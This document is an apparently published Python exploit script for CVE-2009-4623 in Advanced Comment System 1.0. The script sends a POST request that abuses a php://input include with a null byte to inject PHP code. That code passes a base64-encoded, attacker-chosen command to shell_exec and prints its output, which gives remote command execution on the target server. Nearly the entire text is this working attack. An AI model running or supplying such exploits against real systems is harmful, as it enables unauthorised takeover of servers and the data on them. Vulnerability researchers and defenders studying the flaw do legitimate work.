# Exploit Title: Advanced Comment System 1.0 - Remote Command Execution (RCE)
# Date: August 19, 2022
# Exploit Author: hupe1980
# Version: Advanced Comment System 1.0
# Tested on: Linux
# CVE: CVE-2009-4623

#!/usr/bin/env python3

import sys
import base64
import requests
import random

def generate_string(size):
    str = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    return ''.join(random.choice(str) for i in range(size))

def exploit(target, cmd):
    url = f"{target}/advanced_comment_system/index.php"

    headers = {'Content-Type': 'application/x-www-form-urlencoded'}

    encoded_cmd = base64.b64encode(cmd)

    delimiter = generate_string(6).encode()

    body = b'ACS_path=php://input%00&cbcmd='
    body += encoded_cmd
    body += b'&<?php echo " '
    body += delimiter
    body += b': ".shell_exec(base64_decode($_REQUEST["cbcmd"])); die ?>'

    try:
        result = requests.post(url=url, headers=headers, data=body)
    except KeyboardInterrupt:
        print("Keyboard interrupt detected.")
        sys.exit()

    if f'{delimiter.decode()}: ' in result.text:
        position = result.text.find(f"{delimiter.decode()}:") + len(f"{delimiter.decode()}: ")

        if len(result.text[position:]) > 0:
            print(result.text[position:])
        else:
            print(f"No output from command '{cmd.decode()}'")
            print(f"Response size from target host: {len(result.text)} bytes")

def main():
    if len(sys.argv) < 3:
        print("(+) usage: %s <target> <cmd>" % sys.argv[0])
        print('(+) eg: %s http://127.0.0.1 "uname -a\'" ' % sys.argv[0])
        sys.exit(-1)

    target = sys.argv[1].rstrip("/")
    cmd = ' '.join(sys.argv[2:]).encode()
    exploit(target, cmd)

if __name__ == "__main__":
    main()